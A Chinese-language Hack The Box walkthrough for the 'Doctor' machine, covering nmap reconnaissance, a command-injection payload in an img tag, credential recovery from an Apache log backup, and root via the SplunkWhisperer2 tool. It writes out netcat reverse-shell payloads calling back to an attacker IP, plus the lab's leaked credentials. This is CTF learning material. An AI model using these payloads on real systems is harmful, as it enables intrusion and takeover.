HTB Doctor

只愿长相守 提交于 2021-01-24 10:32:11

HTB Doctor(Easy)

地址:https://www.hackthebox.eu/home/machines/profile/278
基本信息
在这里插入图片描述在进行渗透之前需要将HTB与kali进行连接,建立连接之后才可以进行渗透
在这里插入图片描述


一、信息收集

在这里插入图片描述靶机地址为10.10.10.209
使用nmap对靶机进行扫描

nmap -sC -sV -sT -O -A 10.10.10.209

开放了22,80,8089三个端口
8089对应的服务为splunk
在这里插入图片描述

二、访问80端口

需要添加一条hosts命令才可以访问其他内容
在这里插入图片描述

三、访问doctors.htb

vim hosts
10.10.10.209 doctors.htb

在这里插入图片描述进入页面后尝试万能登陆密码,但是失败了

在这里插入图片描述
注册用户进行登录看看是否有可利用的信息,发现可能存在xss漏洞,可以构造xss代码反弹shell

<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>

在这里插入图片描述成功反弹,获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入home目录查看是否有可利用信息
在shaun目录下发现user.txt
在这里插入图片描述尝试查看,但是没有权限被拒绝
在这里插入图片描述通过其他途径进行权限的提升,最终在/var/log/apache2路径下发现backup文件
在这里插入图片描述



查看backup是否能够获得有用信息
筛选含有密码的记录

cat backup | grep password

在这里插入图片描述
切换shaun用户登录,查看user.txt但是这不是最终要获取的内容
需要提权到root权限才可以获得
在这里插入图片描述


四、提权

利用8089对应的服务为splunk进行提权

git clone https://github.com/cnotin/SplunkWhisperer2.git 复制到/htb/doctor文件夹下
cd SplunkWhisperer2/ 进入SplunkWhisperer2文件 
cd PySplunkWhisperer2/ 进入PySplunkWhisperer2文件 
chmod 777 PySplunkWhisperer2_remote.py 提权

在这里插入图片描述
在这里插入图片描述通过github中的使用方法进行操作
在这里插入图片描述

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.3 --username shaun --password Guitar123 --payload " "nc.traditional -e /bin/bash '10.10.14.3' '8888'"

在这里插入图片描述
在这里插入图片描述进入root目录获取root.txt
在这里插入图片描述

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!